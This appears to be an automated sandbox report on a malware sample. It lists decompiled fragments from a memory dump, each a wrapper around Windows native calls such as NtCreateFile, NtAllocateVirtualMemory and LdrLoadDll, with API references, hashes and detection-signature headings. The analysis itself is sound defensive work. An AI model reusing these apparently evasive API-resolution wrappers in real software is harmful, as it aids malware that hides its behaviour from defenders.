			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x00418693
0x0041869f
0x004186a7
0x004186ac
0x004186b2
0x004186cd
0x004186d5
0x004186d9

APIs

NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5

Strings

1:A, xrefs: 004186AC, 004186B8
r=A, xrefs: 004186CD, 004186D4
r=A, xrefs: 004186B2, 004186C0

Memory Dump Source

Source File: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 1:A$r=A$r=A
API String ID: 2738559852-4243674446
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B40(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;

				_v8 =  &_v536;
				_t15 = E0041AF70( &_v12, 0x104, _a8);
				_t32 = _t31 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B390(_v8, __ebx, __eflags, _v8);
					_t33 = _t32 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B610( &_v12, 0);
						_t33 = _t33 + 8;
					}
					_t18 = E00419720(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b5c
0x00409b5f
0x00409b64
0x00409b69
0x00409b73
0x00409b78
0x00409b7b
0x00409b7d
0x00409b85
0x00409b8a
0x00409b8a
0x00409b91
0x00409b99
0x00409b9c
0x00409b9e
0x00409bb2
0x00000000
0x00409bb4
0x00409bba
0x00409b6e
0x00409b6e
0x00409b6e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2

Memory Dump Source

Source File: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004185DA, Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004185DA(void* __ecx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t22;
				void* _t34;

				asm("invalid");
				_t16 = _a4;
				_t4 = _t16 + 0xc40; // 0xc40
				E004191E0(_t34, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t22;
			}

0x004185da
0x004185e3
0x004185ef
0x004185f7
0x0041862d
0x00418631

APIs

NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D

Memory Dump Source

Source File: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6aeb18c598df9b13317057b6f1e52da4d7d59bf08a2fe15f31e6f6a8c5fbd3ce
Instruction ID: d0be538fce3c5d89ea9a43005c69c5aa0d2f94ed1e87fb90393b38bc9d49c019
Opcode Fuzzy Hash: 6aeb18c598df9b13317057b6f1e52da4d7d59bf08a2fe15f31e6f6a8c5fbd3ce
Instruction Fuzzy Hash: AD01EFB2205108AFCB08CF98CC95EEB37A9AF8C344F158248FA0CD7240C630E841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004185E0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004185ef
0x004185f7
0x0041862d
0x00418631

APIs

NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D

Memory Dump Source

Source File: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187C0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004187cf
0x004187d7
0x004187f9
0x004187fd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9

Memory Dump Source

Source File: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041870A, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041870A(void* __ebx, intOrPtr _a4, void* _a8) {
				long _t9;
				void* _t13;

				asm("aam 0xab");
				_t6 = _a4;
				_t3 = _t6 + 0x10; // 0x300
				_t4 = _t6 + 0xc50; // 0x409763
				E004191E0(_t13, _a4, _t4,  *_t3, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}

0x0041870a
0x00418713
0x00418716
0x0041871f
0x00418727
0x00418735
0x00418739

APIs

NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735

Memory Dump Source

Source File: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: f3a7b7e754a3fcb8d82aaf756fd3d8c3e50ebb763334f64b4e014dbc867ef863
Instruction ID: beb3ddebad2a1f1baada203e32ce0860b18227a927f3be2b8516abbb75e721cb
Opcode Fuzzy Hash: f3a7b7e754a3fcb8d82aaf756fd3d8c3e50ebb763334f64b4e014dbc867ef863
Instruction Fuzzy Hash: 9EE01275641114BBEB10EF94CC89ED77F68EF45350F158499F9595B242C530E640CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418710, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418710(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00418713
0x00418716
0x0041871f
0x00418727
0x00418735
0x00418739

APIs

NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735

Memory Dump Source

Source File: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 011F9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011F991A

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 30613501e137fb42f96d3af11dc0eba48cfc33b27cf5f8d5e2b5b20f464c605d
Instruction ID: 3e36a38dd5c03beb41ba3e0c7188607ffedad3e35a76322b6e1dedfe4035fd69
Opcode Fuzzy Hash: 30613501e137fb42f96d3af11dc0eba48cfc33b27cf5f8d5e2b5b20f464c605d
Instruction Fuzzy Hash: A19002B121200802D24171E944047460005A7D0341F51C111A5054558FC6D98DD577A5

Uniqueness

Uniqueness Score: -1.00%

Function 011F99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011F99AA

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f33003bd2a1b14bbddf11a7a2defae5bf1feac0fec65a4f38e4f4838c3b6eed5
Instruction ID: c7b565f258914ccd36aec45a9dfa4db48b6722b9620d0664109099b989105639
Opcode Fuzzy Hash: f33003bd2a1b14bbddf11a7a2defae5bf1feac0fec65a4f38e4f4838c3b6eed5
Instruction Fuzzy Hash: A99002A135200842D20161E94414B060005E7E1341F51C115E1054558EC699CC527266

Uniqueness

Uniqueness Score: -1.00%

Function 011F9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011F984A

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eab53debc7b6cb6c61efa40faaa7566b136bd1053cb31a503e21174e8d9f5805
Instruction ID: 374b5fe426e43de1f13ce6953d7da039849a0b801b1aab11678638c12c2a21e4
Opcode Fuzzy Hash: eab53debc7b6cb6c61efa40faaa7566b136bd1053cb31a503e21174e8d9f5805
Instruction Fuzzy Hash: 00900261253045525646B1E944045074006B7E0281791C112A1404954DC5A69856E761

Uniqueness

Uniqueness Score: -1.00%

Function 011F9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011F986A

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31387e1fcfc266f75158341ea4a81c6f3709accf374c5e1b702d6ecddffb90cd
Instruction ID: c75ba83d2bfa5614a6e586ede72f40e3278ef563a64a62588e7aafb1232d67cb
Opcode Fuzzy Hash: 31387e1fcfc266f75158341ea4a81c6f3709accf374c5e1b702d6ecddffb90cd
Instruction Fuzzy Hash: 7990027121200813D21261E945047070009A7D0281F91C512A041455CED6D68952B261

Uniqueness

Uniqueness Score: -1.00%

Function 011F98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011F98FA

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ff5eef3b0643fe3717bf9d424ca4f84c2464e512348f949139bc88a63410a87
Instruction ID: 47b68b85eea10ea57bf409ec0655602e0ab8c96cb0ab56327910272158a78e9a
Opcode Fuzzy Hash: 6ff5eef3b0643fe3717bf9d424ca4f84c2464e512348f949139bc88a63410a87
Instruction Fuzzy Hash: D090026161200902D20271E94404616000AA7D0281F91C122A1014559FCAA58992B271

Uniqueness

Uniqueness Score: -1.00%

Function 011F9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011F9A0A

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 342275a2cd08eff1657feed3ebb1494fff51a752773ca72b9da0935e01be2dab
Instruction ID: 2da29b95a0c92c2006117ddef0a69bf0513a97a24499ea5f12e6e81101e0c1a0
Opcode Fuzzy Hash: 342275a2cd08eff1657feed3ebb1494fff51a752773ca72b9da0935e01be2dab
Instruction Fuzzy Hash: 0B90027121240802D20161E9481470B0005A7D0342F51C111A1154559EC6A5885176B1

Uniqueness

Uniqueness Score: -1.00%

Function 011F9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011F9A2A

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4136143671708393429bfb943fbbf13a0d9d7d1c842e1dc4f649221d5eac475a
Instruction ID: 8aa91584aba53603c092010b49048c39b076bac403e524e4595f8a1e782a0b31
Opcode Fuzzy Hash: 4136143671708393429bfb943fbbf13a0d9d7d1c842e1dc4f649221d5eac475a
Instruction Fuzzy Hash: 0590026161200442424171F988449064005BBE1251751C221A0988554EC5D9886567A5

Uniqueness

Uniqueness Score: -1.00%

Function 011F9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011F9A5A

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e0c4cc96174ff9df64f272a816d9bfe21fd4dad276d2ba148c1fd846f5ffde10
Instruction ID: bdc18501c9e37f8ca0da1e0adff7196f75e96d992d4b910f24d5f93dd06ae42b
Opcode Fuzzy Hash: e0c4cc96174ff9df64f272a816d9bfe21fd4dad276d2ba148c1fd846f5ffde10
Instruction Fuzzy Hash: FE90026122280442D30165F94C14B070005A7D0343F51C215A0144558DC99588616661

Uniqueness

Uniqueness Score: -1.00%

Function 011F9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011F954A

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 771952c1bbc65a9a8e0d60a20799925ac41499e827fca1648e34cb216b358713
Instruction ID: 6c707740720beebb3452197c62ab293f97e89b41db34ecf80c00d00dd7a9b474
Opcode Fuzzy Hash: 771952c1bbc65a9a8e0d60a20799925ac41499e827fca1648e34cb216b358713
Instruction Fuzzy Hash: 95900265222004030206A5E907045070046A7D5391351C121F1005554DD6A188616261

Uniqueness

Uniqueness Score: -1.00%

Function 011F95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011F95DA

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fa103e21a1548633340fad33e704fc1e25931b5185425691135497ad7dcc8bd0
Instruction ID: 7dbff81ab4e49e81d2e03a227a2f26513246702eb389c5ae48cf99c4c544208e
Opcode Fuzzy Hash: fa103e21a1548633340fad33e704fc1e25931b5185425691135497ad7dcc8bd0
Instruction Fuzzy Hash: 199002A121300403420671E94414616400AA7E0241B51C121E1004594EC5A588917265

Uniqueness

Uniqueness Score: -1.00%

Function 011F9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011F971A

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7912b7f33dc39d27d570a03d311c3e28d52d4b7511c4cc44b4b78d3d2a1e37a6
Instruction ID: 9ca1dcf1480de3f26f1de01e3d57ceb343aad6d247d570beda2a5ed5defea311
Opcode Fuzzy Hash: 7912b7f33dc39d27d570a03d311c3e28d52d4b7511c4cc44b4b78d3d2a1e37a6
Instruction Fuzzy Hash: 0D90027121200802D20165E954086460005A7E0341F51D111A5014559FC6E588917271

Uniqueness

Uniqueness Score: -1.00%

Function 011F9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011F978A

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dc799f6eb1cb68beae5a2b523d4001bc68b25ea07bc80498553c6cf6553a6d7d
Instruction ID: c82b068bbf52536eb326550633df526f6003702bff52ac262ce37e4a827c3635
Opcode Fuzzy Hash: dc799f6eb1cb68beae5a2b523d4001bc68b25ea07bc80498553c6cf6553a6d7d
Instruction Fuzzy Hash: 1290026922300402D28171E9540860A0005A7D1242F91D515A000555CDC99588696361

Uniqueness

Uniqueness Score: -1.00%

Function 011F97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011F97AA

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5c1b711526405917ab61ae3fab3a6f7954d06a3646e020f202e84ae017b3cdca
Instruction ID: 348d6ad9992facb9bdbb669b743f244a401d16a002ab4c86aab3b3c53e784447
Opcode Fuzzy Hash: 5c1b711526405917ab61ae3fab3a6f7954d06a3646e020f202e84ae017b3cdca
Instruction Fuzzy Hash: 7390026131200403D24171E954186064005F7E1341F51D111E0404558DD99588566362

Uniqueness

Uniqueness Score: -1.00%

Function 011F9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011F9FEA

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 50e28ad5a8ae7d86e6744eb5e14e45b32e083631a2a82a36ab88a4c521533ca9
Instruction ID: b771df5ac57e08505374339fa49ecec2aaa29b5730467a727480086cd1c3db04
Opcode Fuzzy Hash: 50e28ad5a8ae7d86e6744eb5e14e45b32e083631a2a82a36ab88a4c521533ca9
Instruction Fuzzy Hash: 5A90027132214802D21161E984047060005A7D1241F51C511A081455CEC6D588917262

Uniqueness

Uniqueness Score: -1.00%

Function 011F9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011F966A

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c18a7be9b128e55f7c221fb929de17ddb3984c7b9b0ec6fc6936c812e0c45dd9
Instruction ID: 6509aaae53daf29c159e9f0b9ba4833ba2095dacd6d8cf748883c068fce9e5ef
Opcode Fuzzy Hash: c18a7be9b128e55f7c221fb929de17ddb3984c7b9b0ec6fc6936c812e0c45dd9
Instruction Fuzzy Hash: 1C90027121200C02D28171E9440464A0005A7D1341F91C115A0015658ECA958A5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 011F96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 011F96EA

Memory Dump Source

Source File: 00000003.00000002.745965591.0000000001190000.00000040.00000001.sdmp, Offset: 01190000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 32c38ba36c8f6fe9f2865a778b44faa9a8b51e8c9929201bc56e188a697ff877
Instruction ID: 4af5af87ddd07d12d30caba2d73573e4dfd4bd860b0a3ccb4e95fffd432da567
Opcode Fuzzy Hash: 32c38ba36c8f6fe9f2865a778b44faa9a8b51e8c9929201bc56e188a697ff877
Instruction Fuzzy Hash: F890027121208C02D21161E9840474A0005A7D0341F55C511A441465CEC6D588917261

Uniqueness

Uniqueness Score: -1.00%

Function 004088D0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7

Uniqueness

Uniqueness Score: -1.00%

Function 004188B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004188c7
0x004188d2
0x004188dd
0x004188e1

APIs

RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD

Strings

65A, xrefs: 004188D2, 004188DC

Memory Dump Source

Source File: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: 65A
API String ID: 1279760036-2085483392
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407280(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0041A140( &_v67, 0, 0x3f);
				E0041AD20( &_v68, 3);
				_t12 = E00409B40(__ebx, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E004092A0(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407280
0x0040728f
0x00407293
0x0040729e
0x004072ae
0x004072be
0x004072c3
0x004072ca
0x004072cd
0x004072da
0x004072dc
0x004072de
0x004072fb
0x004072fb
0x00000000
0x004072fd
0x00407302

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA

Memory Dump Source

Source File: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418A41, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00418A41(void* __eflags, WCHAR* _a12, WCHAR* _a16, struct _LUID* _a20) {
				intOrPtr _v0;
				intOrPtr* _t7;
				int _t9;
				void* _t16;

				asm("a16 aad 0xb8");
				if(__eflags < 0) {
					_push(ds);
					_t10 = _v0;
					_push(0x98e820c9);
					_t7 = E004191E0(_t16, _v0, _v0 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
				}
				_pop(es);
				 *_t7 =  *_t7 + _t7;
				_t9 = LookupPrivilegeValueW(_a12, _a16, _a20); // executed
				return _t9;
			}

0x00418a41
0x00418a44
0x00418a4b
0x00418a53
0x00418a5c
0x00418a6a
0x00418a6a
0x00418a6c
0x00418a6d
0x00418a80
0x00418a84

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80

Memory Dump Source

Source File: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

